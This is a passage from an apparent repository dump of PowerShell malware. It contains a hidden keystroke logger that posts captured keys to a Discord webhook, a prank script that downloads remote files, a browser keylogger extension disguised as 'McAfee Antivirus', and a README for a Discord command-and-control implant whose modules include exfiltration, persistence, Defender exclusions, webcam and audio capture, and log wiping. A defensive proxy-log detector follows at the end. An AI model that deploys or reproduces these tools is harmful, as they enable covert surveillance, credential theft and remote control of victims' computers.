; $dc = (irm $dc).url} 22 | 23 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 24 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 25 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 26 | if($hwnd -ne [System.IntPtr]::Zero){ 27 | $Type::ShowWindowAsync($hwnd, 0) 28 | } 29 | else{ 30 | $Host.UI.RawUI.WindowTitle = 'hideme' 31 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 32 | $hwnd = $Proc.MainWindowHandle 33 | $Type::ShowWindowAsync($hwnd, 0) 34 | } 35 | 36 | # Import DLL Definitions for keyboard inputs 37 | $API = @' 38 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 39 | public static extern short GetAsyncKeyState(int virtualKeyCode); 40 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 41 | public static extern int GetKeyboardState(byte[] keystate); 42 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 43 | public static extern int MapVirtualKey(uint uCode, int uMapType); 44 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 45 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 46 | '@ 47 | $API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru 48 | 49 | # Add stopwatch for intellegent sending 50 | $LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew() 51 | $KeypressThreshold = [TimeSpan]::FromSeconds(10) 52 | 53 | # Start a continuous loop 54 | While ($true){ 55 | $keyPressed = $false 56 | try{ 57 | # Start a loop that checks the time since last activity before message is sent 58 | while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) { 59 | # Start the loop with 30 ms delay between keystate check 60 | Start-Sleep -Milliseconds 30 61 | for ($asc = 8; $asc -le 254; $asc++){ 62 | # Get the key state. 
(is any key currently pressed) 63 | $keyst = $API::GetAsyncKeyState($asc) 64 | # If a key is pressed 65 | if ($keyst -eq -32767) { 66 | # Restart the inactivity timer 67 | $keyPressed = $true 68 | $LastKeypressTime.Restart() 69 | $null = [console]::CapsLock 70 | # Translate the keycode to a letter 71 | $vtkey = $API::MapVirtualKey($asc, 3) 72 | # Get the keyboard state and create stringbuilder 73 | $kbst = New-Object Byte[] 256 74 | $checkkbst = $API::GetKeyboardState($kbst) 75 | $logchar = New-Object -TypeName System.Text.StringBuilder 76 | # Define the key that was pressed 77 | if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) { 78 | # Check for non-character keys 79 | $LString = $logchar.ToString() 80 | if ($asc -eq 8) {$LString = "[BKSP]"} 81 | if ($asc -eq 13) {$LString = "[ENT]"} 82 | if ($asc -eq 27) {$LString = "[ESC]"} 83 | # Add the key to sending variable 84 | $send += $LString 85 | } 86 | } 87 | } 88 | } 89 | } 90 | finally{ 91 | If ($keyPressed) { 92 | # Send the saved keys to a webhook 93 | $escmsgsys = $send -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 94 | $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss" 95 | $escmsg = $timestamp+" : "+'`'+$escmsgsys+'`' 96 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsg} | ConvertTo-Json 97 | Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys 98 | #Remove log file and reset inactivity check 99 | $send = "" 100 | $keyPressed = $false 101 | } 102 | } 103 | # reset stopwatch before restarting the loop 104 | $LastKeypressTime.Restart() 105 | Start-Sleep -Milliseconds 10 106 | } 107 | -------------------------------------------------------------------------------- /Windows-Idiot-Prank/main.ps1: -------------------------------------------------------------------------------- 1 | <# ================================================ WINDOWS IDIOT PRANK 
======================================================== 2 | 3 | SYNOPSIS 4 | This script is a powershell interpretation of the famous windows idiot virus. 5 | 6 | USAGE 7 | Run the script 8 | stop in task manager (when console is hidden) 9 | 10 | #> 11 | 12 | Add-Type -AssemblyName System.Drawing 13 | Add-Type -AssemblyName System.Windows.Forms 14 | 15 | 16 | # Hide the Powershell console 17 | $hide = 1 18 | if ($hide -eq 1){ 19 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 20 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 21 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 22 | 23 | if ($hwnd -ne [System.IntPtr]::Zero) { 24 | $Type::ShowWindowAsync($hwnd, 0) 25 | } 26 | else { 27 | $Host.UI.RawUI.WindowTitle = 'hideme' 28 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 29 | $hwnd = $Proc.MainWindowHandle 30 | $Type::ShowWindowAsync($hwnd, 0) 31 | } 32 | } 33 | 34 | # Download sounds and images 35 | iwr -Uri 'https://i.ibb.co/gDVfZ0L/white.jpg' -OutFile "$env:TEMP\white.png" 36 | iwr -Uri 'https://i.ibb.co/0nxjGzH/black.jpg' -OutFile "$env:TEMP\black.png" 37 | iwr -Uri 'https://github.com/beigeworm/assets/raw/main/idiot.wav' -OutFile "$env:TEMP\sound.wav" 38 | sleep 1 39 | 40 | Function SpawnImage{ 41 | 42 | $job1 = { 43 | 44 | while ($true){ 45 | (New-Object Media.SoundPlayer "$env:TEMP\sound.wav").Play(); 46 | sleep 5 47 | } 48 | 49 | } 50 | 51 | $job2 = { 52 | 53 | Add-Type -AssemblyName System.Windows.Forms 54 | Add-Type -AssemblyName System.Drawing 55 | 56 | $form = New-Object System.Windows.Forms.Form 57 | $form.Text = "Idiot.exe" 58 | $form.Width = 350 59 | $form.Height = 300 60 | $form.TopMost = $true 61 | $form.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\DFDWiz.exe") 62 | $form.FormBorderStyle = [System.Windows.Forms.FormBorderStyle]::FixedDialog 63 | 64 | $screen = 
[System.Windows.Forms.Screen]::PrimaryScreen 65 | $Width = $screen.Bounds.Width 66 | $Height = $screen.Bounds.Height 67 | $X = [math]::Round($Width / 2) 68 | $Y = [math]::Round($Height / 2) 69 | 70 | $form.StartPosition = "Manual" 71 | $form.Location = [System.Drawing.Point]::new($X - $form.Width / 2, $Y - $form.Height / 2) 72 | 73 | $rand = New-Object System.Random 74 | $dx = $rand.Next(-10, 10) 75 | $dy = $rand.Next(-10, 10) 76 | 77 | $timer = New-Object System.Windows.Forms.Timer 78 | $timer.Interval = 10 79 | 80 | $image1 = [System.Drawing.Image]::FromFile("$env:TEMP\white.png") 81 | $image2 = [System.Drawing.Image]::FromFile("$env:TEMP\black.png") 82 | 83 | $images = @($image1, $image2) 84 | $imageIndex = 0 85 | $moveCount = 0 86 | 87 | function Set-BackgroundImage { 88 | param ( 89 | [System.Drawing.Image]$image 90 | ) 91 | $form.BackgroundImage = $image 92 | $form.BackgroundImageLayout = "Stretch" 93 | } 94 | 95 | $timer.Add_Tick({ 96 | $newX = $form.Location.X + $dx 97 | $newY = $form.Location.Y + $dy 98 | if ($newX -lt 0 -or $newX + $form.Width -gt $Width) { 99 | $script:dx = -$dx 100 | } 101 | if ($newY -lt 0 -or $newY + $form.Height -gt $Height) { 102 | $script:dy = -$dy 103 | } 104 | $form.Location = [System.Drawing.Point]::new( 105 | [Math]::Min([Math]::Max($newX, 0), $Width - $form.Width), 106 | [Math]::Min([Math]::Max($newY, 0), $Height - $form.Height) 107 | ) 108 | 109 | $script:moveCount++ 110 | if ($moveCount -ge 20) { 111 | $script:moveCount = 0 112 | $script:imageIndex = ($imageIndex + 1) % $images.Length 113 | Set-BackgroundImage $images[$imageIndex] 114 | } 115 | }) 116 | 117 | $timer.Start() 118 | $form.Add_Shown({ $form.Activate() }) 119 | [void]$form.ShowDialog() 120 | 121 | } 122 | 123 | Start-Job -ScriptBlock $job1 124 | Start-Job -ScriptBlock $job2 125 | 126 | } 127 | 128 | function MouseState { 129 | $previousState = [Windows.Forms.Control]::MouseButtons 130 | while ($true) { 131 | $currentState = [Windows.Forms.Control]::MouseButtons 
132 | if ($previousState -ne $currentState) { 133 | Write-Host "Mouse Click Detected!" 134 | $previousState = $currentState 135 | SpawnImage 136 | break 137 | } 138 | Start-Sleep -Milliseconds 50 139 | } 140 | } 141 | 142 | while ($true){ 143 | MouseState 144 | Start-Sleep -Milliseconds 500 145 | } 146 | 147 | -------------------------------------------------------------------------------- /Chrome-Extension-Keylogger/main.ps1: -------------------------------------------------------------------------------- 1 | $hookurl = "$dc" # YOUR_WEBHOOK_HERE 2 | 3 | # Hide the console 4 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 5 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 6 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 7 | 8 | if ($hwnd -ne [System.IntPtr]::Zero) { 9 | $Type::ShowWindowAsync($hwnd, 0) 10 | } 11 | else { 12 | $Host.UI.RawUI.WindowTitle = 'hideme' 13 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 14 | $hwnd = $Proc.MainWindowHandle 15 | $Type::ShowWindowAsync($hwnd, 0) 16 | } 17 | 18 | # Webhook shortened URL handler 19 | $hookurl = (irm $hookurl).url 20 | 21 | # Create the extension file 22 | $DirPath = "C:\Users\Public\Chrome" 23 | New-Item -ItemType Directory -Path $DirPath 24 | 25 | # Create the Main Javascript file (main.js) 26 | $mainjs = @' 27 | let keys = ""; 28 | const current = document.URL; 29 | document.addEventListener("keydown", (event) => { 30 | const key = event.key; 31 | if (key === "Enter") { 32 | keys += "\n"; 33 | return; 34 | } 35 | if (key === "Backspace") { 36 | keys = keys.slice(0, keys.length - 1); 37 | return; 38 | } 39 | if (key === "CapsLock" || key === "Shift") { 40 | return; 41 | } 42 | if (key === "Control") { 43 | keys += "[Ctrl]"; 44 | return; 45 | } 46 | // Arrows 47 | if (key === "ArrowLeft") { 48 | keys += "[LeftArrow]"; 49 | return; 50 | } 51 | if (key === 
"ArrowRight") { 52 | keys += "[RightArrow]"; 53 | return; 54 | } 55 | if (key === "ArrowDown") { 56 | keys += "[DownArrow]"; 57 | return; 58 | } 59 | if (key === "ArrowUp") { 60 | keys += "[UpArrow]"; 61 | return; 62 | } 63 | // End arrows 64 | keys += key; 65 | saveKeysLocal(); 66 | }); 67 | 68 | window.setInterval(async () => { 69 | keys = getKeysLocal(); 70 | if (keys == "") { 71 | return; 72 | } 73 | const message = `<${current}>\nLogged Keystrokes: ` + "```" + keys + "```"; 74 | sendMessageToDiscord(discordWebhook, message); 75 | keys = ""; 76 | saveKeysLocal(); 77 | }, 20000); // time in milliseconds 78 | 79 | async function sendMessageToDiscord(webhook, msg) { 80 | await fetch(webhook, { 81 | method: "POST", 82 | headers: { 83 | "Content-Type": "application/json", 84 | }, 85 | body: JSON.stringify({ 86 | content: msg, 87 | }), 88 | }); 89 | } 90 | 91 | function saveKeysLocal() { 92 | localStorage.setItem("keys", keys); 93 | } 94 | 95 | function getKeysLocal() { 96 | return localStorage.getItem("keys"); 97 | } 98 | '@ 99 | $mainjs | Out-File -FilePath "$DirPath/main.js" -Encoding utf8 -Force 100 | 101 | # Create the service worker (background.js) 102 | $backgroundjs = @' 103 | chrome.runtime.onMessage.addListener( 104 | function (request, sender, sendResponse) { 105 | sendResponse(request); 106 | } 107 | ); 108 | '@ 109 | $backgroundjs | Out-File -FilePath "$DirPath/background.js" -Encoding utf8 -Force 110 | 111 | # Crwate the manifest file (manifest.json) 112 | $manifest = @' 113 | { 114 | "name": "McAfee Antivirus", 115 | "description": "Antivirus chrome extension made by McAfee. 
Browse securely on the internet!", 116 | "version": "2.2", 117 | "manifest_version": 3, 118 | "background": { 119 | "service_worker": "background.js" 120 | }, 121 | "content_scripts": [ 122 | { 123 | "matches": [ 124 | "*://*/*" 125 | ], 126 | "js": [ 127 | "Webhook.js", 128 | "main.js" 129 | ] 130 | } 131 | ] 132 | } 133 | '@ 134 | $manifest | Out-File -FilePath "$DirPath/manifest.json" -Encoding utf8 -Force 135 | 136 | #create the webhook file 137 | "const discordWebhook = `"$hookurl`";" | Out-File -FilePath "C:\Users\Public\Chrome\Webhook.js" -Encoding utf8 -Force 138 | 139 | # Send keys to manually open chrome and add extension 140 | $wshell = New-Object -ComObject wscript.shell 141 | Start-Process chrome.exe example.com 142 | sleep 7 143 | $wshell.AppActivate("chrome.exe") 144 | $wshell.SendKeys("{TAB}") ;sleep -m 500 145 | $wshell.SendKeys("{TAB}") ;sleep -m 500 146 | $wshell.SendKeys("{TAB}") ;sleep -m 500 147 | $wshell.SendKeys("chrome://extensions/") ;sleep -m 500 148 | $wshell.SendKeys("{ENTER}") ;sleep 4 149 | $wshell.SendKeys("{TAB}") ;sleep -m 500 150 | $wshell.SendKeys(" ") ;sleep 2 151 | $wshell.SendKeys("{TAB}") ;sleep -m 500 152 | $wshell.SendKeys("{ENTER}") ;sleep 4 153 | $wshell.SendKeys("C:\Users\Public\Chrome");sleep -m 500 154 | $wshell.SendKeys("{ENTER}") ;sleep -m 1000 155 | $wshell.SendKeys("{BACKSPACE}") ;sleep -m 500 156 | $wshell.SendKeys("{ENTER}") 157 | 158 | # Kill Chrome process 159 | sleep 4 160 | $wshell.SendKeys("%{F4}") 161 | 162 | <# 163 | Add-Type -AssemblyName System.Windows.Forms 164 | [System.Windows.Forms.SendKeys]::SendWait('%{F4}') 165 | #> 166 | -------------------------------------------------------------------------------- /Discord-C2/README.md: -------------------------------------------------------------------------------- 1 | # PoshCord-C2 2 | 3 | **SYNOPSIS** 4 | 5 | Using a Discord bot along with discords API and Powershell to Act as a Command and Control Platform. 

**INFORMATION**

This script uses a Discord bot along with Discord's API to create a server channel that can control a Windows PC.
Every 10 seconds it will check for a new message in chat and interpret it as a custom command / module in PowerShell.

**Demo** (using .vbs stager and python bot)

![GIF 3-14-2024 7-18-11 PM](https://github.com/beigeworm/PoshCord-C2/assets/93350544/d1805cf3-f850-45c1-b4d2-c342cc17ecdb)

**SETUP**
1. Make a Discord bot at https://discord.com/developers/applications/
2. Turn on ALL intents in the 'Bot' tab.

![image](https://github.com/beigeworm/PoshCord-C2/assets/93350544/f4b381b1-9217-4469-90de-e913681aecd6)

3. Give these permissions in the OAuth2 tab and copy the link into a browser URL bar

![Screenshot_1](https://github.com/beigeworm/PoshCord-C2/assets/93350544/1c944403-b4b0-4730-bc53-c958f4082ef9)

4. Add the bot to your Discord server
5. Click 'Reset Token' in the "Bot" tab for your token
6. Change $tk below with your bot token
7. Change $ch below to the channel ID of your channel.

**USAGE**
1. Set up the script
2. Run the script on a target.
3. Check Discord for the 'waiting to connect..' message.
4. Type the computer's name into chat to start a session
5. The session will be started in a newly created channel (unless you use -nonew to use the master channel, e.g. `DESKTOP-3DG5fS -nonew`)
6. Use the commands listed below

**MODULES / COMMANDS**

*Write these in chat to run on the target.*

- **SpeechToText**: Send audio transcript to Discord
- **QuickInfo**: Send a quick System info embed (sent on first connect)
- **Systeminfo**: Send System info as text file to Discord
- **FolderTree**: Save folder trees to file and send to Discord
- **EnumerateLAN**: Show devices on LAN (see ExtraInfo)
- **NearbyWifi**: Show nearby wifi networks (!user popup!)
- **ChromeDB**: Gather Database files from Chrome and send to Discord (view them in DBBrowser.exe)

- **AddPersistance**: Add this script to startup.
- **RemovePersistance**: Remove Poshcord from startup
- **IsAdmin**: Check if the session is admin
- **Elevate**: Attempt to restart script as admin (!user popup!)
- **ExcludeCDrive**: Exclude C:/ Drive from all Defender Scans
- **ExcludeAllDrives**: Exclude C:/ - G:/ Drives from Defender Scans
- **EnableRDP**: Enable Remote Desktop on target.
- **EnableIO**: Enable Keyboard and Mouse
- **DisableIO**: Disable Keyboard and Mouse

- **RecordAudio**: Record microphone and send to Discord
- **RecordScreen**: Record Screen and send to Discord
- **TakePicture**: Take a webcam picture and send to Discord
- **Exfiltrate**: Send various files. (see ExtraInfo)
- **Upload**: Upload a file from connected machine. (see ExtraInfo)
- **Download**: Download a file to the current directory on the client. (attach a file with the command)
- **Screenshot**: Take a screenshot of the desktop and send to Discord
- **Keycapture**: Capture Keystrokes and send to Discord

- **FakeUpdate**: Spoof Windows-10 update screen using Chrome
- **Windows93**: Start parody Windows93 using Chrome
- **WindowsIdiot**: Start fake Windows95 using Chrome
- **SendHydra**: Never ending popups (use killswitch to stop)
- **SoundSpam**: Play all Windows default sounds on the target
- **Message**: Send a message window to the User (!user popup!)
- **VoiceMessage**: Send a message window to the User (!user popup!)
- **MinimizeAll**: Send a voice message to the User
- **EnableDarkMode**: Enable System wide Dark Mode
- **DisableDarkMode**: Disable System wide Dark Mode
- **VolumeMax**: Maximise System Volume
- **VolumeMin**: Minimise System Volume
- **ShortcutBomb**: Create 50 shortcuts on the desktop.
- **Wallpaper**: Set the wallpaper (wallpaper -url http://img.com/f4wc)
- **Goose**: Spawn an annoying goose (Sam Pearson App)

- **ExtraInfo**: Get a list of further info and command examples
- **Cleanup**: Wipe history (run prompt, powershell, recycle bin, Temp)
- **Kill**: Stop a running module (e.g. Keycapture / Exfiltrate)
- **ControlAll**: Control all waiting sessions simultaneously
- **ShowAll**: Control all waiting sessions simultaneously
- **Pause**: Pause the current authenticated session
- **Close**: Close this session


**FEATURES**

**Custom Scripting**

You can add custom scripting / commands - Type 'YOUR CUSTOM POWERSHELL COMMAND' in chat

**Mass Control Mode**

Control all waiting sessions simultaneously with 'controll-all' to mass authenticate sessions.

**Killswitch**

Save a hosted file's contents as 'kill' to stop the 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands.

# If you like my work please leave a star. ⭐
--------------------------------------------------------------------------------
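The README above says the script checks its channel for a new message every 10 seconds, and that fixed interval is something a defender can hunt for in web-proxy logs. The following is an added detection example, not code from the PoshCord-C2 repository; the log layout, client names, channel ID and thresholds are constructed assumptions. It flags clients whose requests to Discord's channel-messages REST route arrive at near-constant intervals.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed proxy-log layout (constructed): ISO time, client, process, method, URL.
LINE = re.compile(r"^(\S+) (\S+) (\S+) (GET|POST) https://([^/\s]+)(/\S*)$")
# Discord REST route for a channel's messages (API version is an assumption).
POLL = re.compile(r"^/api/v\d+/channels/\d+/messages")

def find_pollers(lines, min_hits=6, max_jitter=2.0):
    """Return {(client, process): median_gap_seconds} for fixed-interval pollers."""
    seen = defaultdict(list)
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # ignore lines that do not fit the assumed layout
        ts, client, proc, _method, host, path = m.groups()
        if host == "discord.com" and POLL.match(path):
            seen[(client, proc)].append(datetime.fromisoformat(ts))
    flagged = {}
    for key, times in seen.items():
        if len(times) < max(min_hits, 2):
            continue  # too few requests to judge regularity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # A scripted polling loop produces near-identical gaps; people do not.
        if statistics.pstdev(gaps) <= max_jitter:
            flagged[key] = statistics.median(gaps)
    return flagged

def sample_log():
    """Constructed sample: one scripted poller and two irregular clients."""
    t0 = datetime(2024, 1, 1, 9, 0, 0)
    url = "https://discord.com/api/v10/channels/1000000000000000001/messages"
    rows = [(s, "WS-014", "powershell.exe") for s in (0, 10, 21, 31, 41, 52, 62, 72)]
    rows += [(s, "WS-020", "chrome.exe") for s in (3, 9, 48, 50, 120, 300)]
    rows += [(s, "WS-031", "python.exe") for s in (5, 70, 75, 400, 401, 900, 1500)]
    return [f"{(t0 + timedelta(seconds=s)).isoformat()} {c} {p} GET {url}"
            for s, c, p in rows]

if __name__ == "__main__":
    for (client, proc), gap in find_pollers(sample_log()).items():
        print(f"{client} {proc}: requests Discord messages every ~{gap:.0f}s")
```

A hit is a lead for triage, not a verdict: check what the flagged process is and whether that workstation has any sanctioned Discord integration.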